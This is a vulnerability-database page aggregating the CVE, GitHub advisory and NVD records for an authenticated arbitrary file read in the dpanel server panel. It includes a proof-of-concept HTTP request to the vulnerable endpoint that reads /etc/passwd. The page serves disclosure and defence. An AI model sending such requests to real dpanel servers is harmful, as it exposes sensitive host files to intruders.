CVE-2025-53363 (GCVE-0-2025-53363)
Vulnerability from cvelistv5 – Published: 2025-08-22 15:18 – Updated: 2025-08-22 15:52
VLAI?
Title
Dpanel has an arbitrary file read vulnerability
Summary
dpanel is an open source server management panel written in Go. In versions 1.2.0 through 1.7.2, dpanel allows authenticated users to read arbitrary files from the server via the /api/app/compose/get-from-uri API endpoint. The vulnerability exists in the GetFromUri function in app/application/http/controller/compose.go, where the uri parameter is passed directly to os.ReadFile without proper validation or access control. A logged-in attacker can exploit this flaw to read sensitive files from the host system, leading to information disclosure. No patched version is available as of this writing.
Severity ?
CWE
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-53363",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-22T15:52:10.278040Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T15:52:20.965Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "dpanel",
"vendor": "donknap",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.0, \u003c= 1.7.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "dpanel is an open source server management panel written in Go. In versions 1.2.0 through 1.7.2, dpanel allows authenticated users to read arbitrary files from the server via the /api/app/compose/get-from-uri API endpoint. The vulnerability exists in the GetFromUri function in app/application/http/controller/compose.go, where the uri parameter is passed directly to os.ReadFile without proper validation or access control. A logged-in attacker can exploit this flaw to read sensitive files from the host system, leading to information disclosure. No patched version is available as of this writing."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"privilegesRequired": "HIGH",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-73",
"description": "CWE-73: External Control of File Name or Path",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T15:18:01.533Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/donknap/dpanel/security/advisories/GHSA-gcqf-pxgg-gw8q",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/donknap/dpanel/security/advisories/GHSA-gcqf-pxgg-gw8q"
}
],
"source": {
"advisory": "GHSA-gcqf-pxgg-gw8q",
"discovery": "UNKNOWN"
},
"title": "Dpanel has an arbitrary file read vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-53363",
"datePublished": "2025-08-22T15:18:01.533Z",
"dateReserved": "2025-06-27T12:57:16.121Z",
"dateUpdated": "2025-08-22T15:52:20.965Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-53363\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-22T15:52:10.278040Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-22T15:52:14.448Z\"}}], \"cna\": {\"title\": \"Dpanel has an arbitrary file read vulnerability\", \"source\": {\"advisory\": \"GHSA-gcqf-pxgg-gw8q\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 4.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"donknap\", \"product\": \"dpanel\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.2.0, \u003c= 1.7.2\"}]}], \"references\": [{\"url\": \"https://github.com/donknap/dpanel/security/advisories/GHSA-gcqf-pxgg-gw8q\", \"name\": \"https://github.com/donknap/dpanel/security/advisories/GHSA-gcqf-pxgg-gw8q\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"dpanel is an open source server management panel written in Go. In versions 1.2.0 through 1.7.2, dpanel allows authenticated users to read arbitrary files from the server via the /api/app/compose/get-from-uri API endpoint. The vulnerability exists in the GetFromUri function in app/application/http/controller/compose.go, where the uri parameter is passed directly to os.ReadFile without proper validation or access control. A logged-in attacker can exploit this flaw to read sensitive files from the host system, leading to information disclosure. No patched version is available as of this writing.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-73\", \"description\": \"CWE-73: External Control of File Name or Path\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-22T15:18:01.533Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-53363\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-22T15:52:20.965Z\", \"dateReserved\": \"2025-06-27T12:57:16.121Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-22T15:18:01.533Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-GCQF-PXGG-GW8Q
Vulnerability from github – Published: 2025-08-22 16:49 – Updated: 2025-08-29 20:34
VLAI?
Summary
Dpanel has an arbitrary file read vulnerability
Details
Summary
Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface.Logged in to Dpanel ,this interface can be used to read arbitrary files.
Details
When a user logs into the administrative backend, this interface can read any files on the host/sever (given the necessary permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function within the app/application/http/controller/compose.go file. The uri parameter submitted by the user in JSON format can be directly read and returned by os.ReadFile without proper security handling.
PoC
POST /api/app/compose/get-from-uri HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ......lWg==
Connection: close
Content-Type: application/json
Content-Length: 21
{"uri":"/etc/passwd"}
Impact
This vulnerability could lead to the leakage of sensitive server file information. In versions from 1.2.0 up to the latest (1.7.2), logged-in users can make requests to this interface.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/donknap/dpanel"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"last_affected": "1.7.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-53363"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-22T16:49:05Z",
"nvd_published_at": "2025-08-22T16:15:44Z",
"severity": "MODERATE"
},
"details": "### Summary\nDpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface.Logged in to Dpanel ,this interface can be used to read arbitrary files.\n\n### Details\nWhen a user logs into the administrative backend, this interface can read any files on the host/sever (given the necessary permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function within the app/application/http/controller/compose.go file. The uri parameter submitted by the user in JSON format can be directly read and returned by os.ReadFile without proper security handling.\n\n\n\n### PoC\n```text\nPOST /api/app/compose/get-from-uri HTTP/1.1\nHost: x.x.x.x\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nAuthorization: Bearer eyJ......lWg==\nConnection: close\nContent-Type: application/json\nContent-Length: 21\n\n{\"uri\":\"/etc/passwd\"}\n```\n\n### Impact\nThis vulnerability could lead to the leakage of sensitive server file information. In versions from 1.2.0 up to the latest (1.7.2), logged-in users can make requests to this interface.",
"id": "GHSA-gcqf-pxgg-gw8q",
"modified": "2025-08-29T20:34:31Z",
"published": "2025-08-22T16:49:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/donknap/dpanel/security/advisories/GHSA-gcqf-pxgg-gw8q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53363"
},
{
"type": "PACKAGE",
"url": "https://github.com/donknap/dpanel"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3909"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Dpanel has an arbitrary file read vulnerability"
}
FKIE_CVE-2025-53363
Vulnerability from fkie_nvd - Published: 2025-08-22 16:15 - Updated: 2025-08-22 18:08
Severity ?
Summary
dpanel is an open source server management panel written in Go. In versions 1.2.0 through 1.7.2, dpanel allows authenticated users to read arbitrary files from the server via the /api/app/compose/get-from-uri API endpoint. The vulnerability exists in the GetFromUri function in app/application/http/controller/compose.go, where the uri parameter is passed directly to os.ReadFile without proper validation or access control. A logged-in attacker can exploit this flaw to read sensitive files from the host system, leading to information disclosure. No patched version is available as of this writing.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "dpanel is an open source server management panel written in Go. In versions 1.2.0 through 1.7.2, dpanel allows authenticated users to read arbitrary files from the server via the /api/app/compose/get-from-uri API endpoint. The vulnerability exists in the GetFromUri function in app/application/http/controller/compose.go, where the uri parameter is passed directly to os.ReadFile without proper validation or access control. A logged-in attacker can exploit this flaw to read sensitive files from the host system, leading to information disclosure. No patched version is available as of this writing."
},
{
"lang": "es",
"value": "dpanel es un panel de administraci\u00f3n de servidores de c\u00f3digo abierto escrito en Go. En las versiones 1.2.0 a 1.7.2, dpanel permite a los usuarios autenticados leer archivos arbitrarios del servidor a trav\u00e9s del endpoint de la API /api/app/compose/get-from-uri. La vulnerabilidad existe en la funci\u00f3n GetFromUri de app/application/http/controller/compose.go, donde el par\u00e1metro uri se pasa directamente a os.ReadFile sin la validaci\u00f3n ni el control de acceso adecuados. Un atacante con sesi\u00f3n iniciada puede explotar esta vulnerabilidad para leer archivos confidenciales del sistema host, lo que puede provocar la divulgaci\u00f3n de informaci\u00f3n. No hay ninguna versi\u00f3n parcheada disponible al momento de escribir este art\u00edculo."
}
],
"id": "CVE-2025-53363",
"lastModified": "2025-08-22T18:08:51.663",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-08-22T16:15:44.887",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/donknap/dpanel/security/advisories/GHSA-gcqf-pxgg-gw8q"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
},
{
"lang": "en",
"value": "CWE-73"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…